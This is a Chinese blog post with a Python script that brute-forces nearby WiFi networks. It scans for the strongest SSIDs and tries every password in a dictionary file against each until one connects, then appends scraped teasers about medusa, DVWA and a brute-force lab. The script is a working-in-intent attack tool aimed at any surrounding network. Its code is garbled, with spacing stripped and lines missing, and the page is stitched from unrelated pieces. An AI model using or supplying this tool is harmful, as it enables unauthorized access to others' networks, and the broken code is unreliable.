python WiFi暴力破解小程式

2021-08-15 00:13:30 字數 4007 閱讀 7248

2、然後用乙個密碼,遍歷所有ssid,嘗試能否連線上

3、密碼正確連線上後,會報錯退出程式,否則會一直執行下去

4、本指令碼沒有優化,執行時可能有bug

5、時間大概是2~3秒掃瞄乙個ssid,根據計算機的不同可以修改,但是時間間隔太短會出錯,比如正確的密碼卻因時間太短認為是錯誤的。

本部落格是學習  分分鐘搞定python破解無線wifi  這篇部落格然後根據自己的需求擴充改寫的,大家可以學習這位大神的部落格。

執行時的現象:

圖一:此處應該有一副

# coding:utf-8

importtime #時間

importpywifi #破解wifi

frompywifiimportconst #引用一些定義

fromasyncio.tasksimportsleep

classpojie():

def__init__(self,path):

self.file=open(path,"r",errors="ignore")

wifi = pywifi.pywifi() #抓取網絡卡介面

self.iface = wifi.inte***ces()[0]#抓取第乙個無限網絡卡

self.iface.disconnect() #測試鏈結斷開所有鏈結

time.sleep(1) #休眠1秒

self.list=self.initialssidnamelist()

# 測試網絡卡是否屬於斷開狀態,

assertself.iface.status()in\

[const.iface_disconnected, const.iface_inactive]

defbies(self):

self.iface.scan() # 掃瞄

bessis = self.iface.scan_results()

list =

fordatainbessis:

returnlen(list), sorted(list, key=lambdast: st[1], reverse=true)

defgetsignal(self):

while true:

n, data = self.bies()

time.sleep(1)

ifnis not0:

returndata[0:10]

definitialssidnamelist(self):

ssidlist = self.getsignal()

namelist =

foriteminssidlist:

returnnamelist

defreadpassword(self,ssidname,mystr):

bool1=self.test_connect(mystr,ssidname)

iflen(mystr)<8:

return falseifbool1:

print("密碼+++++++++++++正確:"+mystr+" "+ssidname)

return trueelse:

print("密碼錯誤:"+mystr+" "+ssidname)

return falsedeftest_connect(self,findstr,ssidname):#測試鏈結

profile = pywifi.profile() #建立wifi鏈結檔案

profile.ssid =ssidname #wifi名稱

# profile.ssid ="netcore" #wifi名稱

profile.auth = const.auth_alg_open #網絡卡的開放,

profile.cipher = const.cipher_type_ccmp #加密單元

profile.key = findstr #密碼

self.iface.remove_all_network_profiles() #刪除所有的wifi檔案

tmp_profile = self.iface.add_network_profile(profile)#設定新的鏈結檔案

self.iface.connect(tmp_profile)#鏈結

time.sleep(2)

ifself.iface.status() == const.iface_connected: #判斷是否連線上

isok=trueelse:

isok=falseself.iface.disconnect() #斷開

time.sleep(1)

#檢查斷開狀態

assertself.iface.status()in\

[const.iface_disconnected, const.iface_inactive]

returnisok

defrun(self):

while true:

mystr = self.file.readline()

forssidnameinself.list:

ret=self.readpassword(ssidname,mystr)

ifret:

raisefileexistserror

def__del__(self):

self.file.close()

path=r"g:\download\6000常用密碼字典.txt"start=pojie(path)

start.run()

medusa 暴力破解

medusa 美杜莎 和hydra 九頭蛇 差不多 科普下 medusa是支援afp,cvs,ftp,http,imap,ms sql,mysql,ncp netware nntp,pcanywhere,pop3,postgresql,rexec,rlogin,rsh,smb,smtp auth v...

DVWA Brute Force(暴力破解)

本系列文集 dvwa學習筆記 分析 isset函式在php中用來檢測變數是否設定 該函式返回的是布林型別的值,即true false 可以看到,伺服器只是驗證了引數login是否被設定,沒有任何的防爆破機制,且對引數username password沒有做任何過濾,存在明顯的sql注入漏洞。方法一利...

作業(暴力破解)

基於單單表的暴力破解 首先先把攔截關一下 因為我們要讓他傳輸資料,沒必要攔截,而且就算是intercept is off 這也不影響我們的burpsuit找到它 然後開啟pikachu訓練靶場,先輸入乙個隨便的賬戶和密碼,然後可以在歷史裡找到位址是127.0.0.1的資料報,找到剛剛輸入的賬戶和密碼...